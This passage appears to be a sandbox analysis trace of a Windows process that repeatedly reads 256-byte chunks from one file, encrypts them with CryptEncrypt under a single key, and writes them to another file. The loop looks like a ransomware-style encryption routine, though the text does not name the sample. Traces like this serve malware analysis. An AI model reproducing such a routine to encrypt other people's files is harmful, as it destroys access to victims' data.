1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.442] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.442] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.442] GetLastError () returned 0x0 [0161.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.443] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.444] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.445] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.446] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.447] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, 